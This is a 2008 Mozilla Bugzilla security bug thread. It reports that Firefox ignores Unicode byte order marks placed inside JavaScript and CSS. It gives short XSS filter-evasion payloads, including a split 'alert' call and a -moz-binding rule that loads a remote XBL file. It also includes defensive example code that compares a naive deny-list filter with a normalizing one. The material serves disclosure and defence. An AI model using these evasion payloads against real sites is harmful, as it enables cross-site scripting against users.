Bugzilla@Mozilla – Bug 446112
Stripping in-line BOM is an XSS risk
Last modified: 2008-11-16 23:12:29 PST
This is much like JavaScript bug 430740 but affects HTML/CSS parsing. security@m.o. received the following from Chris Weber of Casaba Security:

July 17, 2008
Platform: Windows XP SP3 and SP2
Product: Firefox 3.0.1
Issue Type: attack technique for filter bypass and evasion which enables cross-site scripting
Exploitability: Easy
Remote: Yes

Here's an attack that leverages a vulnerability in the way Firefox handles Unicode Byte Order Marks U+FEFF and U+FFFE in the javascript interpreter. The Unicode spec and FAQ at http://unicode.org/faq/utf_bom.html call for implementations to treat a BOM in the middle of a file as ZWNBS. The best behavior would be to make the ZWNBS a part of the string, which would have the effect of defusing any attack exploiting this technique.

"Q: What should I do with U+FEFF in the middle of a file?
A: In the absence of a protocol supporting its use as a BOM and when not at the beginning of a text stream, U+FEFF should normally not occur. For backwards compatibility it should be treated as ZERO WIDTH NON-BREAKING SPACE (ZWNBSP), and is then part of the content of the file or string."

Right now, we can insert a BOM in the middle of javascript method names, strings, and keywords such as 'var'. This enables exploits where attackers can control fragments of javascript such as:

var x = "here's a U+FEFF in the middle of a string"; alert(x);
al[U+FEFF]ert("heres a U+FEFF in the middle of the alert() method name");
v[U+FEFF]ar y = "here's a U+FEFF in the middle of the var keyword"; alert(y);

We can also insert a BOM in the middle of a CSS string such as -moz-binding, enabling attacks which bypass validation filters. The attack would look like:

p { -moz-bi[U+FEFF]nding: url(http://casabasecurity.com/stage/example_2.xml#redirect) }

I'll stop elaborating from here. In short this issue allows for a lot of flexibility in bypassing validation or other logic attackers might want to bypass to enable attacks such as cross-site scripting.

Thanks,
Chris
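The validation gap the report describes is a mismatch between what a filter matches on and what the consumer actually parses: if the parser silently drops U+FEFF, a substring check on the raw text never sees "alert" or "-moz-binding". The following is an added example, not code from this bug or from Mozilla, showing a naive filter beside a hardened one that normalizes the input first. It generalizes beyond the report by removing every Unicode format character (general category Cf, which contains U+FEFF) plus the noncharacters U+FFFE and U+FFFF; the sample inputs and token list are constructed.

```javascript
'use strict';

// Constructed example (not from the bug report or Mozilla). Models the gap the
// report describes: a filter matching on raw text while the consumer drops
// U+FEFF / U+FFFE, so "al<U+FEFF>ert" passes the filter and still parses as
// "alert". Generalization beyond the report: we strip every Unicode format
// character (\p{Cf}, which includes U+FEFF and other zero-width characters)
// and the noncharacters U+FFFE / U+FFFF.
const INVISIBLE_RE = /[\p{Cf}\uFFFE\uFFFF]/gu;

// Naive filter: substring match on the untouched input. This is the kind of
// check the interior-BOM trick walks past.
function naiveFilterBlocks(input, blockedTokens) {
  return blockedTokens.some((tok) => input.includes(tok));
}

// Drop a single leading BOM (a legitimate encoding signature), then return the
// text with all invisible format characters removed and a count of how many
// were found in the interior.
function normalizeForValidation(input) {
  const body = input.startsWith('\uFEFF') ? input.slice(1) : input;
  const matches = body.match(INVISIBLE_RE) || [];
  return {
    normalized: body.replace(INVISIBLE_RE, ''),
    interiorHidden: matches.length,
  };
}

// Hardened filter: reject outright on any interior invisible character (there
// is no legitimate reason for a BOM inside a script or stylesheet fragment),
// and otherwise match blocked tokens against what a stripping parser would see.
function hardenedFilterBlocks(input, blockedTokens) {
  const { normalized, interiorHidden } = normalizeForValidation(input);
  if (interiorHidden > 0) return true;
  return blockedTokens.some((tok) => normalized.includes(tok));
}

// Runs both filters over constructed samples modelled on the report's cases
// and returns the verdicts so they can be inspected or asserted on.
function runSamples() {
  const blocked = ['alert', '-moz-binding']; // constructed deny-list
  const samples = {
    splitMethod: 'al\uFEFFert("x")',
    splitKeyword: 'v\uFEFFar y = 1;',
    splitCssProp: 'p { -moz-bi\uFEFFnding: url(example.xml#redirect) }',
    leadingBomOnly: '\uFEFFvar z = 1;',
    plainBlocked: 'alert("x")',
    benign: 'var z = 1;',
  };
  const out = {};
  for (const [name, text] of Object.entries(samples)) {
    out[name] = {
      naive: naiveFilterBlocks(text, blocked),
      hardened: hardenedFilterBlocks(text, blocked),
    };
  }
  return out;
}

console.log(JSON.stringify(runSamples(), null, 2));
```

The split cases show the naive filter returning false while the hardened filter returns true; the leading-BOM-only input is accepted by both, since a BOM at offset 0 is an encoding signature rather than content. Rejecting on interior invisible characters is deliberately stricter than the Unicode FAQ's "treat as ZWNBSP" advice: a validator cannot know whether every downstream consumer keeps the character as content or drops it, so refusing the input removes the ambiguity.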
Created attachment 330316 [details] example (mostly of bug 430740)
The JavaScript part is covered by bug 430740, this bug is to cover similar issues in HTML/XML/CSS parsing. Bug 430740 happens to Firefox 2.0, but the -moz-binding issue seems to be a regression in FF3.
I was fooled by running the testcase on Chris's site, which is not quite the one attached here (doesn't have the BOM in -moz-binding). When running on my own server I could only reproduce the JavaScript cases covered by bug 430740 and not any problems with BOM injected into HTML tags and attributes or style data.

*** This bug has been marked as a duplicate of bug 430740 ***
I didn't mean to fool you with regard to the CSS BOM injection, it was a mistake on my part. As you said I can't reproduce that either right now. Back to testing, Chris
Didn't mean to imply it might have been intentional fooling, I fooled myself going too fast through my first triage pass. No harm done, and thanks again for reporting the JavaScript problem--it's a serious potential XSS risk.
Forgot to credit Chris in the advisory. Updated http://www.mozilla.org/security/announce/2008/mfsa2008-43.html